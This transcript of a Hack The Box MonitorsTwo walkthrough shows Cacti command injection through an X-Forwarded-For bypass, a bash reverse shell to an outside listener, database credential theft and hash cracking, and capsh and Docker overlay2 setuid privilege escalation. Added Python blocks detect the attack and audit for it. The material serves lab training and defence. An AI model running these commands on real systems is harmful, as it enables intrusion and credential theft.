Transcript for:
Hack The Box - Monitoring 2 Exploit Walkthrough

What's going on YouTube, this is ippsec. We're doing MonitorsTwo from Hack The Box, which the exploitation was dead simple. The foothold: you exploit a Cacti instance and it gets you a shell on a Docker container. You could use Metasploit; I don't think the Metasploit module was out at time of release, but it came out shortly after. We're going to overcomplicate it a little bit and do it manually, just so we understand the exploit and see what we can do when things go wrong. With that shell you can then pillage the database, get some credentials that are used to SSH into the box, and this is where the box starts to get tricky. There is an email that points to a vulnerability in Docker, and you actually have to go back down to the Docker container, find a privesc (which is just a GTFOBin), get root there, and then you can drop a setuid binary there, and since the host OS is sharing the file system you can just execute that setuid binary and get up to root. I call that tricky because it's very rare in a privesc where you have to go from the host system back down to a Docker to go back up to the host. But either way, let's just get into the box.

As always I'm gonna start with the nmap: so nmap -sC for default scripts, -sV to enumerate versions, -oA to output all formats, put it in the nmap directory and call it monitors2, then the IP address of 10.10.11.211. This can take some time to run, so I've already run it. Looking at the results we have just two ports open, the first one being SSH on port 22, and its banner tells us it's an Ubuntu server. We also have HTTP on port 80.
Its banner tells us it's nginx running version 1.18, also on Ubuntu, and looking at the title we have "Login to Cacti" (or cacti, I don't know how to pronounce that). But let's just go over to the page, so 10.10.11.211, and we get this login banner. We can try default credentials like admin/admin, I think maybe it's admin/user or something, but the key thing is we have this version, 1.2.22. So I'm going to Google "cacti 1.2.22" and I'll just add "exploit" to it, and we get a heap of exploits. Now we could just go to GitHub, and I think if we just ran this exploit it would magically work and we'd get a shell, but we don't really learn anything through that, so I'm gonna take a step back. We're not just going to run a PoC blindly; I'm gonna go look at these two articles. This one again is going to be code; this page has a description of the CVE and it has a few things. It's talking about host ID. Let's see: "the module immediately attempts exploitation. During exploitation the module sends a GET request to remote_agent.php" (so this is the script) "with the action parameter set to polldata and the X-Forwarded-For header set to the provided value for the X-Forwarded-For IP, by default 127.0.0.1. In addition, the poller_id parameter is set to the payload and the host ID and local ID are set to brute-forced or provided values." So this is what a lot of the scripts do, they kind of just hard-code it, and if you just use the script you don't learn that much, right? So the first thing we're going to do is take this, because it gives us the URL pretty easily and it has these IDs, like a parameters statement, and it just brute forces it. But we're not going to use it; we're just going to cheat, get this payload, and we're going to send this over to Burp Suite and then kind of see how this works. And we're actually going to go over to Metasploit, because Metasploit's code generally explains things better and they don't take a lot of things for granted.

So if we just sent this payload it's probably going to error out, because we need to put numbers here, and since this says IDs I'm going to guess they are integers. And maybe it didn't error; we just see "you're not authorized". If we remember, we had the X-Forwarded-For header that the description told us to set, and it said set it to 127.0.0.1 to bypass authentication on this endpoint. So now if we send it we just get errors: validation error for host_id, see backtrace, and it doesn't really have that much, we just get a bunch of errors. So let's just put integers for these. Since it is an ID I'm going to do 0; we can do host_id of zero as well, and then poller_id I'm going to do ;sleep+1 (this plus is URL encoded for space). And now if we send it we just get a blank array. I'm going to increment my host_id by one, two, three, we don't really get anything. If we increment this we get data back. Do we get it back for host_id 2? No, only when host_id is one, and I set it to one. I generally test for zero or one first; it just depends where it starts counting, right, if it starts at zero or starts at one. In this case it starts at one, and the host ID is for itself. And at this point, if you don't know what Cacti is, it's I guess a graphing application. We Google cacti, go to images, you can kind of get an idea what it is (not exploit; let's just Google cacti, go to images and probably specify software), and it takes a bunch of data from networking devices or whatnot and displays it as graphs. So host ID is going to be the ID of the host, and this is a really old version, but it's a monitoring application, so host ID of one is probably gonna be itself. And then we have this piece and we don't know exactly what it's doing; the script just brute forces it, and eventually it takes about a second to return because we have a sleep of one. We do a sleep of two, we go to two milliseconds, right? So we can go try this one more time: that's two seconds, one is one second, and if we did ten it's going to sleep for 10 seconds. So we definitely have code execution.

But my gripe is, if you just go off these Python modules you'll see it just brute forces until it works; there's no logic here of it actually testing the exploit. So we run exploit, exploit is here, we set a user agent, it's going to set the payload. Let's see, how does it get local data ID? It's just brute forcing one to a hundred and sending them all. So why did we get code execution on six (we see it's 10 seconds there) but we didn't get code execution on one? And the answer is going to be this rrd name, but if you just did it by Python scripts you're probably out of luck. If we look at this there is a Metasploit module, and if we Google for this and look through the actual Metasploit code we will see exactly what is happening. So pull this up. Generally speaking, I know Metasploit's frowned upon, but whenever I see an exploit on Metasploit or just a random Python script, I'm going to choose the Metasploit version because that's generally tested more, it's kept more up to date, it has more of just a process around adding it; it's not just some random person committing to GitHub. And I started doing this around the time of like EternalBlue, because a lot of people like that Python script because you're not using Metasploit, you can pass OSCP, but that has a tendency to crash the SMB service where Metasploit does not. So I like using Metasploit, especially when looking through code, even though chances are it's going to be Ruby (it supports other languages now), but you get an idea what it is. So we have this exploit and it's going to brute force the IDs, kind of just like what we saw with the Python script, but if we go to this definition of brute force IDs we'll see right now it's just setting the variables, making sure we don't do a thousand attempts because that would just take a long time, and then it's going to enumerate. Let's see, we'd send this remote agent request; if we look at that we're on line 199, but all this does is send a GET request, set the X-Forwarded-For header and send this, right? And he even says when brute forcing this is just a random number, but on exploitation it's the payload. So let's go back up to line 199 where that was, and let's see: unexpected response; it's going to parse the body if it is an array, checking, and now it's checking the rrd value. And let's see, so we have this variable exploitable rrd names, and if it finds it in this list then it returns true. So let's see exactly what this is, and we have these rrd names, and uptime is one of them. So there's probably going to be a few that we can actually exploit, and that's just this. So if we kept going through this, so like seven, that's proc, eight, proc, are these all going to be proc? 20, 30, or 230, 240, I don't know why everything is suddenly proc. But what did we say, six was the exploitable... oh, what? Changing poller_id, that's why. So seven is nothing, eight is nothing, six is uptime. So I guess all these other rrds just are not deployed for this host ID, but we got this, we have code execution. We've wasted enough time talking about it, so let's just get a shell. So I'm gonna go here and do bash -c 'bash -i >& /dev/tcp/10.10.14.8/9001 0>&1', like that, and then let's URL encode it: so I'm going to highlight everything and then press Ctrl+U, and we can send a shell. So nc -lvnp 9001, send this payload, and we have a shell. Let's do python3 -c 'import pty; pty.spawn("/bin/bash")'. And python3 isn't on the box; which python, which python2.
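The walkthrough above has two defender-relevant facts in it: the endpoint's access control is IP based and trusts X-Forwarded-For, and the payload goes into poller_id, which should only ever be an integer. The following is an added example (it is not from the video, from Cacti or from the Metasploit module) showing detection logic run over web-server log lines and the client-IP rule that would have closed the header bypass. It assumes an nginx-style access-log format with the X-Forwarded-For value appended as a trailing quoted field, an assumed reverse-proxy address of 10.0.0.5, and constructed sample lines (10.10.14.8 is the attacker address used in the video).

```python
"""Detection for the Cacti remote_agent.php polldata abuse, plus the safe
client-IP rule. Added example, not part of the walkthrough or of Cacti.

Assumed log format (nginx-style, X-Forwarded-For appended as the last field):
  client - - [time] "METHOD target HTTP/x" status bytes "referer" "ua" "xff"
"""
import re
import ipaddress
from urllib.parse import urlsplit, unquote_plus

LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "[^"]*" "(?P<xff>[^"]*)"$'
)

TRUSTED_PROXIES = {"10.0.0.5"}  # assumed address of our own reverse proxy


def parse_line(line):
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def parse_query(query):
    """Split a query string on '&' only. ';' is deliberately NOT a separator:
    it is the injection character, and treating it as a separator would hide
    the payload (older urllib.parse_qs versions did exactly that)."""
    params = {}
    for part in query.split("&"):
        if part:
            k, _, v = part.partition("=")
            params.setdefault(unquote_plus(k), []).append(unquote_plus(v))
    return params


def client_ip(remote_addr, xff, trusted_proxies=TRUSTED_PROXIES):
    """The address an IP allow-list check should use.

    The vulnerable pattern trusts X-Forwarded-For from anyone, so any client
    can claim 127.0.0.1. Safe rule: honour the header only when the TCP peer
    is one of our own proxies, and then take the value that proxy appended
    (the right-most one), never an arbitrary client-supplied left-most value.
    """
    if remote_addr in trusted_proxies and xff:
        return xff.split(",")[-1].strip()
    return remote_addr


def analyse(rec):
    """Reasons a parsed request looks like the polldata abuse (empty if clean)."""
    reasons = []
    url = urlsplit(rec["target"])
    if not url.path.endswith("/remote_agent.php"):
        return reasons
    q = parse_query(url.query)
    if q.get("action", [""])[0] != "polldata":
        return reasons
    xff_first = rec["xff"].split(",")[0].strip()
    try:
        if ipaddress.ip_address(xff_first).is_loopback and rec["client"] not in TRUSTED_PROXIES:
            reasons.append("loopback X-Forwarded-For from untrusted peer %s" % rec["client"])
    except ValueError:
        pass  # "-" or garbage: not an IP, nothing to say
    for name in ("poller_id", "host_id", "local_data_ids[]"):
        for val in q.get(name, []):
            if not val.isdigit():
                reasons.append("non-numeric %s=%r" % (name, val))
    return reasons


def scan(lines):
    """Run analyse() over raw log lines; returns [(line_no, reasons)] for hits."""
    hits = []
    for n, line in enumerate(lines, 1):
        rec = parse_line(line)
        if rec:
            reasons = analyse(rec)
            if reasons:
                hits.append((n, reasons))
    return hits


# Constructed sample: a legitimate poll via the proxy, the attack, and noise.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /remote_agent.php?action=polldata&poller_id=1&host_id=1&local_data_ids[]=6 HTTP/1.1" 200 30 "-" "poller" "127.0.0.1"',
    '10.10.14.8 - - [01/Jan/2024:10:00:01 +0000] "GET /remote_agent.php?action=polldata&poller_id=;sleep+10&host_id=1&local_data_ids[]=6 HTTP/1.1" 200 30 "-" "Mozilla" "127.0.0.1"',
    '10.10.14.8 - - [01/Jan/2024:10:00:02 +0000] "GET /index.php HTTP/1.1" 200 1200 "-" "Mozilla" "-"',
]

if __name__ == "__main__":
    for n, reasons in scan(SAMPLE_LOG):
        print("line %d: %s" % (n, "; ".join(reasons)))
```

Two things worth noticing: the header only becomes a signal once you know which peers are allowed to set it, which is why TRUSTED_PROXIES is the first thing to fill in for a real deployment, and the parser does its own splitting so the ";" in the payload survives into the alert instead of being eaten as a separator.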
So I don't think we have python on this box at all, so we may have the script binary, and script we can also use to do the same thing; it's actually a little bit easier. Let's do man script real quick just so I see the arguments. We probably want to use -c, and I need the out file as well; -O (capital O) is out file. So I'm going to do script -O /dev/null so we're not actually creating a log on the box of everything we did, then the next command is going to be -q for quiet and then /bin/bash. And now I can do stty: so Ctrl+Z, stty raw -echo; fg, enter, enter, and we have a proper terminal here. I'm just going to do the rows and columns, so stty rows 31 cols 121, export TERM=xterm so we can clear the screen, and now we just have a shell on the Cacti box. So the very first thing I always do whenever I get a shell on a web application is go check out the database. So I'm going to do a find . and I'm just going to grep for config, and there is include/config.php, so that's probably what I want. So let's go into include and I can grep database in config.php, and let's see, we have username root, password root. So let's do mysql -u root -proot, and we can't connect to the MySQL server through the socket. Looking up, we have a hostname of db, and at this point I should mention we are in a Docker container. We can kind of tell we're in a container based upon the hostname; I do ls -la on / and we see .dockerenv. And let's see, ping db, ping is not there. I'm just gonna do a wget on db; I don't expect this to work, but I'm testing for DNS, so we see it's resolving db to this IP address, 172.19.0.2. So db does exist; that again was in the config. So I can go back to my MySQL command and I'm going to add a -h for hostname and we'll specify db, root, and now we're logged in. So we can do a show tables... databases; it's probably gonna be cacti, right? cd cacti, how do I do cd, it's use cacti. Show tables, and we probably want the user_auth, so I'm going to do a select * from user_auth limit 1. I just want to get one ID right now, and I like using \G because if I just do semicolon I can't read that, but \G makes this a bit more human readable, and this is why I only limit 1, so I can see each field in this. And I want username, password, name and email address, so now I can do select username, password, full_name, email_address from user_auth. I'm not going to do the \G because we don't have a lot of information here and I can easily eyeball this, right? So I can just copy this and then let's go save this. So vi user_auth; we can make a directory cacti, then the user_auth, paste, and then I'm going to grep for pipe like this on user_auth. Does this get me everything? It does, so I can just do an awk now and we can say print 2: this is one, this is two, this is three, this is four, so two colon four, and then we can grep -v username to hide the first line, and we'll output that to hashes. And we have admin and marcus; I don't know what this guest is, that just looks like hex to me. Let's see, if we go to Decoder, decode as hex, I have no idea what this is, smart decode. But I'm going to try cracking these hashes because I know what these are. So let's send those over to the Kraken, which is just a box on my network. You can always use your computer to crack; I wouldn't recommend cracking in a VM just because it's a CPU intensive process, or GPU intensive, and it can go very slowly. If you just use your host operating system it definitely works; the reason I don't is because I'm recording and it may just cause me to drop frames or other things, so I just like always SSHing off my box. Let's go into this and grab the credentials: cat hashes, you can just grab these two lines. I'm going to vi monitors2, paste this in, and then we can go ./hashcat hashes/monitors2, man I'm typing all over the place, then /opt/wordlist/rockyou.txt, and it's going to auto detect the hash. It looks like it's some type of bcrypt format, probably. Let's see, oh, we have to do --username because we had the username, colon, the hash. So we have a few options: "$2*$", that's probably going to be what it is; md5 pass, like these don't look similar, and it's for CMS e-commerce. I'm gonna guess 3200 first, so let's do -m 3200. And I really love that hashcat now has that auto detection feature; I know it's been like one to two years, maybe longer, but gone are the times of just always having to consult the manual when you wanted to get a mode out. Super nice. So it is now cracking; I can do s for status to see how long it's going to take, and we already got one. The password is funkymonkey. So I'm going to do a, let's see, monitors2, --username, is it --show, -m 3200, there we go, and we can see marcus has the password of funkymonkey. So let's try SSHing in with marcus. Let's go here, ssh marcus@10.10.11.211, I'm gonna do funkymonkey, and we get logged in. It also tells us marcus does have mail. I always like just reading the mail; if it's an actual environment it's probably not going to be anything special, but if it is root it may just be like failed logins, things like that, where you get IP addresses and things like that off of it. But if we look at it we have an email; it looks like it's from administrator@monitorstwo.htb to all, and we got a security bulletin. So the first one is talking about the Linux kernel before 5.11.14.
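The grep/awk pipeline above turns the mysql table into username:hash lines, and hashcat's auto-detect then names the scheme. As an added example (not from the video, not from hashcat), here is the same extraction done as a small parser for mysql's boxed table output, with a format check per hash so a mis-pasted column or an unfamiliar scheme is noticed before a long cracking run starts. The table text and every hash in it are constructed placeholders, not the values from the box; the hashcat mode numbers are the documented ones (3200 bcrypt, 1800 sha512crypt, 7400 sha256crypt, 500 md5crypt, 0 raw MD5).

```python
"""Parse mysql's '| a | b |' table output into hashcat --username input and
identify each hash scheme. Added example; constructed data, placeholder hashes.
"""
import re

# Constructed output in the shape mysql prints for
#   select username, password, full_name, email_address from user_auth;
SAMPLE_TABLE = """\
+----------+--------------------------------------------------------------+---------------+-----------------------+
| username | password                                                     | full_name     | email_address         |
+----------+--------------------------------------------------------------+---------------+-----------------------+
| admin    | $2y$10$PLACEHOLDERhashNOTrealPLACEHOLDERhashNOTrealPLACEHOLD | Administrator | admin@example.invalid |
| guest    | 00000000000000000000000000000000                             | Guest Account |                       |
| marcus   | $2y$10$placeholderHASHnotREALplaceholderHASHnotREALplacehold | Marcus        | marcus@example.invalid|
+----------+--------------------------------------------------------------+---------------+-----------------------+
"""

# (name, hashcat mode, shape). Order matters: most specific first.
HASH_SCHEMES = [
    ("bcrypt",        3200, re.compile(r"^\$2[aby]\$(\d{2})\$[./A-Za-z0-9]{53}$")),
    ("sha512crypt",   1800, re.compile(r"^\$6\$[^$]{1,16}\$[./A-Za-z0-9]{86}$")),
    ("sha256crypt",   7400, re.compile(r"^\$5\$[^$]{1,16}\$[./A-Za-z0-9]{43}$")),
    ("md5crypt",       500, re.compile(r"^\$1\$[^$]{1,8}\$[./A-Za-z0-9]{22}$")),
    ("md5 (raw hex)",    0, re.compile(r"^[0-9a-f]{32}$")),
]


def parse_mysql_table(text):
    """Rows as dicts keyed by the header cells; '+---+' border lines are skipped."""
    rows, header = [], None
    for line in text.splitlines():
        if not line.startswith("|"):
            continue
        cells = [c.strip() for c in line.split("|")[1:-1]]
        if header is None:
            header = cells
        else:
            rows.append(dict(zip(header, cells)))
    return rows


def identify(h):
    """(scheme name, hashcat mode) or None if the string matches no known shape."""
    for name, mode, rx in HASH_SCHEMES:
        if rx.match(h):
            return name, mode
    return None


def bcrypt_cost(h):
    """Work factor of a bcrypt hash: 2**cost rounds, which is why -m 3200 is slow."""
    m = HASH_SCHEMES[0][2].match(h)
    if not m:
        raise ValueError("not bcrypt: %r" % h)
    return int(m.group(1))


def to_hashcat_lines(rows, user_col="username", hash_col="password"):
    """'user:hash' lines grouped by hashcat mode (one run per mode), plus a list
    of rows whose hash matched nothing, so they are not silently dropped."""
    by_mode, unknown = {}, []
    for r in rows:
        h = r[hash_col]
        found = identify(h)
        if found is None:
            unknown.append((r[user_col], h))
            continue
        by_mode.setdefault(found[1], []).append("%s:%s" % (r[user_col], h))
    return by_mode, unknown


if __name__ == "__main__":
    by_mode, unknown = to_hashcat_lines(parse_mysql_table(SAMPLE_TABLE))
    for mode, lines in sorted(by_mode.items()):
        print("hashcat -m %d --username ..." % mode)
        for line in lines:
            print("  " + line)
    for user, h in unknown:
        print("unrecognised hash for %s: %s" % (user, h))
```

The grouping matters because hashcat runs one mode per invocation: the two bcrypt rows go into one -m 3200 file and the 32-hex guest value into another, which is exactly the split the video's "what is this guest hash" moment was about. The cost parser makes the speed difference visible: $2y$10$ means 1024 rounds per guess, so a bcrypt list will always crack far slower than a raw-MD5 one under the same wordlist.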
If I do a uname -a we have 5.4.0-147. So how Ubuntu does kernels is really annoying; some things put it here, which is the minor number, Ubuntu likes putting 147 here. We can just look at the date of the CVE and when this was compiled to see if it is relevant. So let's copy this, go over to Firefox, Google: May 14th, and this is March 21st, so it looks vulnerable because March is the third month and May is the fifth, but keep in mind this is 2023 and this is a 2021 CVE, so this is definitely not vulnerable to the kernel privesc. Then we have this one, it mentions Cacti. I want to say we're like 1.2.22, so this is also probably not vulnerable if we go here, but even if it is, we've already shelled this service, so it is not interesting to us. I'm not sure, did we hang the service by getting our shell? That is weird, okay, we'll just move on. Then we have this CVE, and this affects Docker, and it wants Docker version 20.10.9. So let's see what version of Docker we have. If I do docker --version, where did I say, probably 20.10.9, it's 20.10.9, and we're at 20.10.5, so we are vulnerable to this CVE. So let's do some quick research on this. If I just Google this CVE it's going to talk about it, and it's probably gonna give us an exploit script, which we're not just going to run. The issue in this is the OverlayFS permissions will traverse the host. So let's see: "Docker OverlayFS enables the container file system to be layered on top of the host, thus allowing the host system access to manipulate files within the container. In the case of this, the overly permissive directory permissions in /var/lib/docker/overlay2 enable unprivileged users to access and execute programs within the container, leading to a potential privesc." So we connect inside the container, we make a setuid version of /bin/bash, and on the host we can execute it. So for this to work we need to get root on this container, because let's see, if we do, is it findmnt? This is going to list where all the Docker directories are. So we have to be able to go into these directories, so let's just do a ls -la on this, and this is a long directory path. This is just where the Docker is, and remember there's two Dockers, at least that we know of: there's db and web, so we want to make sure we get on the right container. So let's go to / and I'm going to go in /tmp and we're going to touch please subscribe. So if we do this, go in /tmp, there's no files here, so I'm going to do findmnt again and let's go to the other one, ls -la this /tmp, and we do have please subscribe. So we do have a way to get here. So if I go in this directory, we can copy the bash off this, right? cp /bin/bash /tmp, we do ls, we now have bash, and we need to make this setuid. So let's go, oh, we have to escalate privileges. So I'm going to do find / -perm -4000, hide all error messages, and looking at the setuid binaries we have capsh. And if we did a GTFOBins (and I'm sure like LinPEAS and all these things will highlight this binary), if we look at it we have capsh and we can set gid and uid to zero, and --, which will break out to bash. So we can just do capsh --uid=0 --gid=0 -- and now we are magically root. The purpose of capsh, let's just do man capsh to see exactly what it is: Linux capability support tool, let's see, it's a testing tool I guess, but it's a legitimate tool. So now that we are root, if we go to /tmp we have bash, so let's do chown root:root on bash, and now when I do ls -la on this directory we have bash owned by root. So you can see where this is going: let's do chmod 4755, which will set this to be a setuid executable, on bash, and over here again the same thing, and now we have this as a setuid. So let's just go into this directory now and then we can execute bash with -p so it accepts our privilege, and we can see our effective user ID is zero, which is root. So if I do cd /root we can now get root.txt. So that's going to be the box. Hope you guys enjoyed it, take care and I will see you all next time.
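The privesc at the end needs three things to line up: a Docker older than the 20.10.9 the bulletin names, a /var/lib/docker/overlay2 tree that unprivileged host users can search into, and a setuid binary planted inside a container's filesystem (plus a setuid capsh in the image to get root there in the first place). As an added example (not from the video or from Docker), here is a host-side audit in Python that checks each of those conditions, so a defender can confirm whether a host is exposed and spot the artifact the technique leaves behind. The version threshold is the one quoted in the email above; the demo() function builds a throwaway overlay2-like tree in a temp directory (constructed, with a constructed "Docker version" string) rather than touching the real one.

```python
"""Host audit for the Docker OverlayFS weakness: version, overlay2 directory
mode, and setuid files inside container filesystems. Added example; the
fixed version 20.10.9 comes from the bulletin quoted in the walkthrough.
"""
import os
import re
import stat
import tempfile

FIXED_VERSION = (20, 10, 9)               # per the bulletin: older than this needs patching
OVERLAY_ROOT = "/var/lib/docker/overlay2"  # the directory the bulletin names


def parse_docker_version(text):
    """'Docker version 20.10.5, build ...' -> (20, 10, 5)."""
    m = re.search(r"version (\d+)\.(\d+)\.(\d+)", text)
    if not m:
        raise ValueError("no version in %r" % text)
    return tuple(int(x) for x in m.groups())


def version_needs_patch(text):
    return parse_docker_version(text) < FIXED_VERSION


def world_searchable(path):
    """True if 'other' has the execute (search) bit: any host user can cd through it."""
    return bool(os.stat(path).st_mode & stat.S_IXOTH)


def find_setuid(root, owner_uid=None):
    """Regular files under root with setuid or setgid set (optionally only those
    owned by owner_uid; pass 0 on a real host to find root-owned ones)."""
    found = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            p = os.path.join(dirpath, name)
            try:
                st = os.lstat(p)          # lstat: do not follow symlinks out of the tree
            except OSError:
                continue
            if not stat.S_ISREG(st.st_mode):
                continue
            if st.st_mode & (stat.S_ISUID | stat.S_ISGID) and (owner_uid is None or st.st_uid == owner_uid):
                found.append(p)
    return sorted(found)


def audit(overlay_root=OVERLAY_ROOT, version_text=None, owner_uid=0):
    """Findings as a dict; a missing overlay directory is reported as None, not raised."""
    findings = {"version_needs_patch": None, "overlay_world_searchable": None, "setuid_files": []}
    if version_text is not None:
        findings["version_needs_patch"] = version_needs_patch(version_text)
    if os.path.isdir(overlay_root):
        findings["overlay_world_searchable"] = world_searchable(overlay_root)
        findings["setuid_files"] = find_setuid(overlay_root, owner_uid)
    return findings


def demo():
    """Constructed scenario: a searchable overlay root holding a container /tmp
    with a planted setuid 'bash', audited as a pre-fix Docker. Returns the
    findings with paths made relative to the temp root."""
    with tempfile.TemporaryDirectory() as tmp:
        container_tmp = os.path.join(tmp, "layer0000", "merged", "tmp")
        os.makedirs(container_tmp)
        os.chmod(tmp, 0o711)                         # 'other' can search: the permissive mode
        planted = os.path.join(container_tmp, "bash")
        with open(planted, "wb") as f:
            f.write(b"#!/bin/sh\n")                  # stand-in for the copied /bin/bash
        os.chmod(planted, 0o4755)                    # the setuid bit the technique relies on
        result = audit(tmp, "Docker version 20.10.5, build 0000000", owner_uid=os.getuid())
        result["setuid_files"] = [os.path.relpath(p, tmp) for p in result["setuid_files"]]
        return result


if __name__ == "__main__":
    print(demo())
```

On a real host run audit() with the default arguments and the output of docker --version; any entry in setuid_files under a container's merged or diff directory is worth treating as an incident indicator, since nothing legitimate drops a root-owned setuid shell into a container's /tmp. The same find_setuid() pointed at an image's extracted filesystem is also how you would catch a setuid capsh before the image ships.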